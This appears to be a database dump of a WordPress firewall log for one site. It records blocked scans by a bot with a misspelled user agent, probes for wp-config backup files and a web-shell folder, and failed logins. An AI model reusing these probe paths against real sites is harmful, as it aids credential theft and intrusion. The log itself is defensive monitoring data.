User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133162,1699888489.824062,1699888489.815300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-parser-frame.php','http://eckankar-colorado.org/wp-includes/class-wp-block-parser-frame.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXBhcnNlci1mcmFtZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133163,1699888489.473717,1699888489.457700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-parser-block.php','http://eckankar-colorado.org/wp-includes/class-wp-block-parser-block.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXBhcnNlci1ibG9jay5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133175,1699888485.149846,1699888485.141000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-snoopy.php','http://eckankar-colorado.org/wp-includes/class-snoopy.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXNub29weS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133059,1699787375.232248,1699787375.223500,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/style-css.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvc3R5bGUtY3NzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133185,1699888481.530565,1699888481.521300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-feed.php','http://eckankar-colorado.org/wp-includes/class-feed.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLWZlZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133166,1699888488.246813,1699888488.238000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-application-passwords.php','http://eckankar-colorado.org/wp-includes/class-wp-application-passwords.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWFwcGxpY2F0aW9uLXBhc3N3b3Jkcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133235,1699888682.886888,1699888682.871900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/db/','http://eckankar-colorado.org/wp-content/plugins/db/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133231,1699888684.260992,1699888684.239300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/prenota/','http://eckankar-colorado.org/wp-content/plugins/prenota/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wcmVub3RhLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133202,1699888475.372845,1699888475.363500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/admin-bar.php','http://eckankar-colorado.org/wp-includes/admin-bar.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2FkbWluLWJhci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133203,1699888474.037082,1699888474.027800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/ALFA_DATA/','http://eckankar-colorado.org/ALFA_DATA/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133226,1699888685.963288,1699888685.954600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-freeform/','http://eckankar-colorado.org/wp-content/plugins/wp-freeform/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1mcmVlZm9ybS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133614,1699888534.321998,1699888534.313400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/formatting.php','http://eckankar-colorado.org/wp-includes/formatting.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Zvcm1hdHRpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133612,1699888535.007757,1699888534.999000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/functions.wp-scripts.php','http://eckankar-colorado.org/wp-includes/functions.wp-scripts.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Z1bmN0aW9ucy53cC1zY3JpcHRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133195,1699888477.957817,1699888477.942400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks.php','http://eckankar-colorado.org/wp-includes/blocks.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133196,1699888477.617951,1699888477.609200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template.php','http://eckankar-colorado.org/wp-includes/block-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133431,1699888605.601081,1699888605.592100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/maint/repair.php','http://eckankar-colorado.org/wp-admin/maint/repair.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21haW50L3JlcGFpci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133252,1699888676.292229,1699888676.283500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps.php','http://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133366,1699888630.548385,1699888630.539100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXByaXZhY3ktZGF0YS1leHBvcnQtcmVxdWVzdHMtbGlzdC10YWJsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133074,1699788203.591977,1699788203.588400,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php.bak',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHAuYmFr\",\"path\":\"L3dwLWNvbmZpZy5waHAuYmFr\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134698,0.000000,1700179903.529747,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134699,1700180073.588029,1700180073.566200,0x00000000000000000000FFFFB9D84602,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/WordPressCore/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133099,1699815345.472758,1699815345.463100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-content/plugins/WordPressCore/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133077,1699788223.961595,1699788223.958000,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php_bkp',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHBfYmtw\",\"path\":\"L3dwLWNvbmZpZy5waHBfYmtw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134675,0.000000,1700171042.700238,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134676,1700171344.534725,1700171344.512700,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134674,0.000000,1700170367.609982,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134666,1700169666.827395,1700169666.805100,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(134659,1700167892.486459,1700167892.477700,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/css/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nzcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133076,1699788202.827666,1699788202.823800,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.inc',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5pbmM=\",\"path\":\"L3dwLWNvbmZpZy5pbmM=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134660,1700167996.750844,1700167996.729000,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/home/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 